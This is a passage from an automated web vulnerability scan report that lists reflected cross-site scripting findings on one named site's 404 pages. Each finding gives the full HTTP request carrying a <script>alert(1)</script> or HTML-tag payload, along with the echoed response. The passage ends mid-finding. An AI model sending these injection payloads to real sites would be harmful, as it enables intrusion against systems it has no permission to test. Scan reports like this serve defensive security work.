User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php?keyword=search...6b5a5<a>a8aa3c20ab7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1817. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf2d5<script>alert(1)</script>a387b484003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bf2d5<script>alert(1)</script>a387b484003=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bf2d5<script>alert(1)</script>a387b484003=1 was not found on this server.</p>
...[SNIP]...

2.1818. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 553f9<a>ceed9238982 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2553f9<a>ceed9238982 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2553f9<a>ceed9238982 was not found on this server.</p>
...[SNIP]...

2.1819. http://www.resellerbase.com/detail/22/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 769fa<script>alert(1)</script>113036dc008 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail769fa<script>alert(1)</script>113036dc008/22/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail769fa<script>alert(1)</script>113036dc008/22/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1820. http://www.resellerbase.com/detail/22/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 439e1<script>alert(1)</script>6b5453a3b34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22439e1<script>alert(1)</script>6b5453a3b34/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22439e1<script>alert(1)</script>6b5453a3b34/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1821. http://www.resellerbase.com/detail/22/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38a4a<script>alert(1)</script>441c41bac28 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes38a4a<script>alert(1)</script>441c41bac28/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes38a4a<script>alert(1)</script>441c41bac28/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1822. http://www.resellerbase.com/detail/22/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2a8b<script>alert(1)</script>0f9a7dbabc0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/search.phpe2a8b<script>alert(1)</script>0f9a7dbabc0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.phpe2a8b<script>alert(1)</script>0f9a7dbabc0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1823. http://www.resellerbase.com/detail/22/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5fd24<a>207376e8f4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/search.php?keyword=search...&Submit3=Search5fd24<a>207376e8f4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.php?keyword=search...&Submit3=Search5fd24<a>207376e8f4&opt=2 was not found on this server.</p>
...[SNIP]...

2.1824. http://www.resellerbase.com/detail/22/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 36ce0<a>e09abda054 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/search.php?keyword=search...36ce0<a>e09abda054&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.php?keyword=search...36ce0<a>e09abda054&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1825. http://www.resellerbase.com/detail/22/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 37cc2<script>alert(1)</script>4be5ef95ff0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2&37cc2<script>alert(1)</script>4be5ef95ff0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2&37cc2<script>alert(1)</script>4be5ef95ff0=1 was not found on this server.</p>
...[SNIP]...

2.1826. http://www.resellerbase.com/detail/22/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b92aa<a>dde48258198 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2b92aa<a>dde48258198 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2b92aa<a>dde48258198 was not found on this server.</p>
...[SNIP]...

2.1827. http://www.resellerbase.com/detail/23/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92e36<script>alert(1)</script>a7d886cdb37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail92e36<script>alert(1)</script>a7d886cdb37/23/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail92e36<script>alert(1)</script>a7d886cdb37/23/ was not found on this server.</p>
...[SNIP]...

2.1828. http://www.resellerbase.com/detail/23/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88bd9<script>alert(1)</script>3cc86507b0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2388bd9<script>alert(1)</script>3cc86507b0a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2388bd9<script>alert(1)</script>3cc86507b0a/ was not found on this server.</p>
...[SNIP]...

2.1829. http://www.resellerbase.com/detail/23/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4eb75<script>alert(1)</script>601295a1f17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/?4eb75<script>alert(1)</script>601295a1f17=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/?4eb75<script>alert(1)</script>601295a1f17=1 was not found on this server.</p>
...[SNIP]...

2.1830. http://www.resellerbase.com/detail/23/pinnaclecart-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/pinnaclecart-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c043<script>alert(1)</script>7ce810c0e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4c043<script>alert(1)</script>7ce810c0e4a/23/pinnaclecart-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4c043<script>alert(1)</script>7ce810c0e4a/23/pinnaclecart-com.html was not found on this server.</p>
...[SNIP]...

2.1831. http://www.resellerbase.com/detail/23/pinnaclecart-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/pinnaclecart-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91115<a>070576924f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection point here is the same 404 template that echoes full <script> payloads unmodified for REST URL parameters 1 and 3 of this path (2.1830 and 2.1832), so confirm by hand whether a script payload in this position is actually filtered before treating the finding as less exploitable than its neighbours.

Request

GET /detail/2391115<a>070576924f/pinnaclecart-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2391115<a>070576924f/pinnaclecart-com.html was not found on this server.</p>
...[SNIP]...

2.1832. http://www.resellerbase.com/detail/23/pinnaclecart-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/pinnaclecart-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76b3b<script>alert(1)</script>9acb54b40fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/76b3b<script>alert(1)</script>9acb54b40fb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/76b3b<script>alert(1)</script>9acb54b40fb was not found on this server.</p>
...[SNIP]...

2.1833. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dbed4<script>alert(1)</script>3901b444b8ce960a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaildbed4<script>alert(1)</script>3901b444b8ce960a6/23/rating.php?id=23&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildbed4<script>alert(1)</script>3901b444b8ce960a6/23/rating.php?id=23&rating=5 was not found on this server.</p>
...[SNIP]...

2.1834. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a432<script>alert(1)</script>c2ab00db4bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5a432<script>alert(1)</script>c2ab00db4bf/23/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5a432<script>alert(1)</script>c2ab00db4bf/23/rating.php was not found on this server.</p>
...[SNIP]...

2.1835. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ea85<script>alert(1)</script>bb20017e5f1fc3060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

